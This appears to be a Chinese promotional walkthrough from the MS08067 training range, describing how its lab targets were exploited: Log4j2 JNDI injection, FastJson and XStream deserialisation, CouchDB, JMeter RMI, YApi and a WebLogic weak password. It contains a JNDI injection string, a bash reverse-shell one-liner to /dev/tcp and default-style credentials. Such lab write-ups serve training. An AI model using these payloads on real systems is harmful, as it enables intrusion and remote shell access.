Taoing
“MS08067实验室,专注于网络安全技能培训与服务。"
官网链接:http://attck.ms08067.com/
Part1
log4j2,⽬标站点:http://27.25.151.24:29458/hello?payload=111
访问站点后,发现参数payload为可控点后, 对该参数进行黑盒测试
尝试JNDI注入时, 语句为:${jndi:dns://teg756.dnslog.cn}
得到dnslog回显记录, 说明目标服务器存在JNDI漏洞, 并且可出网
使用JNDI-Injection-Exploit.jar工具生成反弹shell :
(反弹语句:bash -i >& /dev/tcp/xx..xx.88/10001 0>&1)
在攻击机上监听10001端口后, 将JNDI-Exploit生成反弹shell发送给服务器
攻击机得到目标bash
Part2
测试目标:目标站点:http://27.25.151.24:23953/
漏洞发现:FastJson 反序列化漏洞访问漏洞所在URL后, 服务器返回了数据信息, 并且通过标题图标获得服务器是Java语言SpringBoot框架开发的Web程序
Java中, 处理Json数据⼀般使用的框架:Jackson、Fastjson 等尝试对其Java框架中, 处理Json数据的组件进行黑盒测试。经过测试多种组件的payload后, 发现存在FastJson反序列化漏洞CVE-2017-18349
(1) 构造⼀个请求DNS的Payload发送给服务器后, dnslog中可以看到目标服务器出网
(4) ⽬标服务器成功将Shell反弹到nc, 获取flag
Part3
测试目标:http://27.25.151.24:25021
漏洞发现:WebSVN 命令执行
漏洞所在URL:
http://27.25.151.24:25021/search.php?repname=test&search=test
漏洞参数:search
WebSVN 命令执行复现过程:
(1) 尝试对search参数进行SQL注入时, 发现命令执行的报错提示
(4) nc获得反弹shell, 使用export命令获取系统环境变量, 取得flag
目标站点:http://27.25.151.24:23531
漏洞发现:xstream 反序列化漏洞
漏洞所在URL:http://27.25.151.24:23531
首先访问⻚面, 看到返回信息提示 hello, input your information please
BurpSuite抓包后, 将原先的GET方法替换为POST方法, 得到了服务器500状态码信息,可收集到的信息:
2.Java后端Web语⾔中可能存在使用了数据处理的组件, 例如:xstream、fastjson 等,经过测试多种组件的payload后,发现存在Xstream反序列化漏洞(CVE-2021-21351)
(1)在攻击机上使用JNDI-Injection-Exploit工具生成JNDI反弹shell, nc进行监听10001端口
Part5
漏洞发现:
(1) Couchdb 特殊目录"_utils"泄露
漏洞所在URL:http://27.25.151.24:23953/_utils/
访问http://27.25.151.24:23385/⻚面后, 服务器返回了类似接口的数据信息
(1).使用nmap对目标CouchDB非默认端口23385进行扫描, 进一步确定是CouchDB数据库
Couchdb 任意命令执行:
通常 CVE-2017-12635 漏洞进行联合的就是 CVE-2017-12636,CVE-2017-12636 需要管理员权限的账户才能进行利用
CVE-2017-12636 复现过程:
(1) 尝试发送Payload给服务器后, 成功返回创建数据库、创建表、插入数据的信息
Part6
目标站点:27.25.151.24:24980
漏洞发现:Jmeter RMI 反序列化命令执行漏洞 (CVE-2018-1297)Jmeter RMI 反序列化漏洞复现过程如下:
(1) 使用 nmap 扫描目标时, 存在RMI服务, 目标将RMI服务1099端口映射到24980端⼝
Part7
目标站点:http://27.25.151.24:24387 2.
漏洞发现:Yapi 任意代码执行漏洞
漏洞复现:
(1) 在目标站点的Yapi 1.8.3管理⻚面中, 注册⼀个用户
Part 8
漏洞发现:Weblogic 弱口令
漏洞所在URL:http://27.25.151.24:21634/console/
访问http://27.25.151.24:21634⻚面, 看到返回信息是Weblogic的默认错误⻚面
(1) 尝试爆破Weblogic默认账户密码后, 成功进⼊Weblogic控制台⻚面
username:weblogic、password:Oracle@123
福利环节
关注公众号,转发此文并留言互动,凡上榜者均有机会获得靶场15天试用名额。(共30个名额)
线上地址:http://attck.ms08067.com
唯一试用要求:试用靶场结束后须提出您的宝贵意见建议!
☎️ 加入靶场交流群
微信:下方二维码
在网络安全这条充满挑战的道路上,MS08067练武场愿与您携手前行,共同成长。我们将继续努力,为您提供更优质的实战演练环境和学习资源,帮助您在网络安全领域取得更大的成就。